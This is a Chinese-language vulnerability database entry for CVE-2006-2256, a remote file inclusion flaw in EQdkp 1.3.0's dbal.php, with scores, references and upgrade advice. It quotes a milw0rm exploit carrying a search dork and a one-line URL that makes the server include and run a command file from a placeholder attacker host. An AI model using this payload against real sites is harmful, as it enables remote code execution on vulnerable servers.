CVE-2006-2256
CVSS6.4
发布时间 :2006-05-09 06:02:00
修订时间 :2011-03-07 21:35:49
NMCOE    

[原文]PHP remote file inclusion vulnerability in includes/dbal.php in EQdkp 1.3.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the eqdkp_root_path parameter.


[CNNVD]EQdkp dbal.php 远程文件包含漏洞(CNNVD-200605-143)

        EQdkp是一种网络游戏团队积分管理系统。
        EQdkp处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        EQdkp的includes/dbal.php脚本没有正确验证eqdkp_root_path参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:eqdkp:eqdkp:1.3.0
cpe:/a:eqdkp:eqdkp:1.2.0
cpe:/a:eqdkp:eqdkp:1.1.0
cpe:/a:eqdkp:eqdkp:1.3_p4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2256
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2256
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-143
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17888
(PATCH)  BID  17888
http://secunia.com/advisories/20040
(VENDOR_ADVISORY)  SECUNIA  20040
http://www.vupen.com/english/advisories/2006/1693
(UNKNOWN)  VUPEN  ADV-2006-1693
http://milw0rm.com/exploits/1764
(UNKNOWN)  MILW0RM  1764
http://xforce.iss.net/xforce/xfdb/26357
(UNKNOWN)  XF  eqdkp-dbal-file-include(26357)
http://www.osvdb.org/25339
(UNKNOWN)  OSVDB  25339

- 漏洞信息

EQdkp dbal.php 远程文件包含漏洞
中危 输入验证
2006-05-09 00:00:00 2006-05-09 00:00:00
远程  
        EQdkp是一种网络游戏团队积分管理系统。
        EQdkp处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        EQdkp的includes/dbal.php脚本没有正确验证eqdkp_root_path参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://eqdkp.com/download.php?file=eqdkp-1.3.1.tar.gz

- 漏洞信息 (1764)

EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability (EDBID:1764)
php webapps
2006-05-07 Verified
0 OLiBekaS
N/A [点击下载]
Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]
		

- 漏洞信息

25339
EQdkp includes/dbal.php eqdkp_root_path Remote File Inclusion
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

EQdkp contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/dbal.php not properly sanitizing user input supplied to the 'eqdkp_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-07 Unknow
2006-05-07 Unknow

- 解决方案

Upgrade to version 1.3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站